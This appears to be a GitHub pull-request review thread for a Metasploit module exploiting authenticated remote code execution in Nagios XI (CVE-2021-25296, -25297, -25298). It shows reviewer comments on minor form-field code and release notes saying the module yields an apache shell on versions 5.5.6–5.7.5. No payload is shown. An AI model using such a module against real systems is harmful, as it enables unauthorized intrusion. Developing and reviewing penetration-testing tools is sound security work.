Some minor changes left I noticed. I'll fix these up myself.

2023-02-07 19:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'ip_address' => Rex::Text.rand_text_alpha(7..15),
Upon closer inspection I'm not sure this should be alpha....

2023-02-07 19:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => Rex::Text.rand_text_alpha(7..20),
These can likely be alphanumberic vs just alpha.

2023-02-07 19:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
Is this purely alpha or can we have numbers in this field as well?

2023-02-07 19:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        return login_result, res_array unless (login_result == 0)
This should actually just be res_array[0] here instead. Same for below.

2023-02-07 20:06 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
Looks like this can be alphanumberic.

2023-02-07 20:20 UTC, gwillcox-r7 commented
This should be good to land once tests pass. I addressed the updates from above in the last commit then squashed things down to remove all the references to fixes. Tried to keep the commit messages for those fixes that were important and well described.

2023-02-07 20:20 UTC, gwillcox-r7 approved these changes

2023-02-07 20:25 UTC, k0pak4 commented
> This should be good to land once tests pass. I addressed the updates from above in the last commit then squashed things down to remove all the references to fixes. Tried to keep the commit messages for those fixes that were important and well described.
> 
> Thanks for PRing this @k0pak4 and appreciate your help on all this!

Thanks for the thorough PR, I know it was a lot of changes so I appreciate it 🎉  Thanks for tidying up the commit history too, it was certainly getting messy

2023-02-07 21:39 UTC, merged

2023-02-07 21:41 UTC, gwillcox-r7 commented
# Release Notes
A new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the `apache` user on NagiosXI devices running version 5.5.6 to 5.7.5 inclusive.